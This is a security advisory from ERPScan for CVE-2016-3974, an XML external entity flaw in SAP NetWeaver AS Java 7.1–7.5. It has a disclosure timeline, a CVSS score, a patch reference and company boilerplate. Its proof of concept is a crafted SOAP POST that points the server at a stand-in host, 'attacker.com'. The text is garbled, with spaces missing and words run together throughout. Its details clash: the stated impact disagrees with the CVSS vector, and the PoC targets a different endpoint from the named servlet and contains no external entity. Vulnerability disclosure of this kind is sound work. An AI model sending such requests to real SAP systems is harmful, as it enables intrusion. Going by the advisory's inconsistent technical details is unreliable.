Application:SAPNetWeaverASJAVAVersionsAffected:SAPNetWeaverASJAVA7.1-7.5VendorURL: http://SAP.com
Bug:XXESent:20.10.2015Reported:21.10.2015Vendor response:21.10.2015Date of PublicAdvisory:08.03.2016Reference:SAPSecurityNote2235994Author:VahagnVardanyan(ERPScan)Description1.ADVISORYINFORMATIONTitle:[ERPSCAN-16-013]SAPNetWeaverASJava ctcprotocol servlet –
XXE vulnerability
AdvisoryID:[ERPSCAN-16-013]Risk:MediumAdvisoryURL: https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/Date published:08.03.2016Vendors contacted:SAP2.VULNERABILITYINFORMATIONClass:XXEImpact: denial of service
RemotelyExploitable:YesLocallyExploitable:NoCVE-2016-3974CVSSInformationCVSSBaseScore v3:6.4/10CVSSBaseVector:AV:AttackVector(Related exploit range)Network(N)AC:AttackComplexity(Required attack complexity)High(H)PR:PrivilegesRequired(Level of privileges needed toexploit)High(H)UI:UserInteraction(Required user participation)None(N)S:Scope(Change in scope due toimpact caused tocomponents beyond
the vulnerable component)Unchanged(U)C:ImpacttoConfidentialityHigh(H)I:ImpacttoIntegrityHigh(H)A:ImpacttoAvailabilityHigh(H)3.VULNERABILITYDESCRIPTIONAuthorized attacker can use a special request toread files from the
server and then escalate his or her privileges.4.VULNERABLEPACKAGESSAPNetWeaverASJAVA7.1-7.5Other versions are probably affected too, but they were not checked.5.SOLUTIONSANDWORKAROUNDSTo correct this vulnerability, install SAPSecurityNote22359946.AUTHORVahagnVardanyan(ERPScan)7.TECHNICALDESCRIPTIONAnXML external entity (XXE) vulnerability in the ConfigurationWizard
in SAPNetWeaverJavaAS7.4 allows remote attackers tocause a denial
of service, conduct SMBRelay attacks, or access arbitrary files via a
crafted XML request related tothe ctcprotocol servlet.
PoCPOST/_tc~monitoring~webservice~web/ServerNodesWSServiceHTTP/1.1Content-Type: text/xml
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body><m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/"><url>attacker.com</url></m:XXX></SOAP-ENV:Body></SOAP-ENV:Envelope>8.REPORTTIMELINESent:20.10.2015Reported:21.10.2015Vendor response:21.10.2015Date of PublicAdvisory:08.03.20169.REFERENCES
https://erpscan.com/advisories/erpscan-16-013-sap-netweaver-7-4-ctcprotocol-servlet-xxe/10.ABOUTERPScanResearchThe company’s expertise is based on the research subdivision of
ERPScan, which is engaged in vulnerability research and analysis of
critical enterprise applications. It has achieved multiple
acknowledgments from the largest software vendors like SAP,Oracle,Microsoft,IBM,VMware,HPfor discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).ERPScan researchers are proud tohave exposed new types of
vulnerabilities (TOP10WebHackingTechniques2012) and tobe
nominated for the best server-side vulnerability at BlackHat2013.ERPScan experts have been invited tospeak, present, and train at 60+
prime international security conferences in 25+ countries across the
continents. These include BlackHat,RSA,HITB, and privateSAP
trainings in several Fortune2000companies.
ERPScan researchers lead the project EAS-SEC, which is focused on
enterprise application security research and awareness. They have
published 3 exhaustive annual award-winning surveys about SAPsecurity.
ERPScan experts have been interviewed by leading media resources and
featured in specialized info-sec publications worldwide. These include
Reuters,Yahoo,SCMagazine,TheRegister,CIO,PCWorld,DarkReading,Heise, and Chinabyte,toname a few.
We have highly qualified experts in staff withexperience in many
different fields of security, from web applications and
mobile/embedded toreverse engineering and ICS/SCADA systems,
accumulating their experience toconduct the best SAP security
research.11.ABOUTERPScanERPScan is the most respected and credible BusinessApplicationSecurityprovider. Founded in 2010, the company operates globally and
enables large Oil and Gas,Financial and Retail organizations tosecure their mission-critical processes. Named as an ‘EmergingVendor’
in Security by CRN, listed among “TOP100SAPSolution providers” and
distinguished by 30+ other awards,ERPScan is the leading SAPSE
partner in discovering and resolving security vulnerabilities. ERPScan
consultants work withSAPSE in Walldorftoassist in improving the
security of their latest solutions.
ERPScan’s primary mission is toclose the gap between technical and
business security, and provide solutions toevaluate and secure SAP
and OracleERP systems and business-critical applications from both,
cyber-attacks as well as internal fraud. Usually our clients are large
enterprises,Fortune2000 companies and managed service providers
whose requirements are toactively monitor and manage security of vast
SAP landscapes on a global scale.
We ‘follow the sun’ and function in two hubs, located in the PaloAlto
and Amsterdamtoprovide threat intelligence services, agile support
and operate local offices and partner network spanning 20+ countries
around the globe.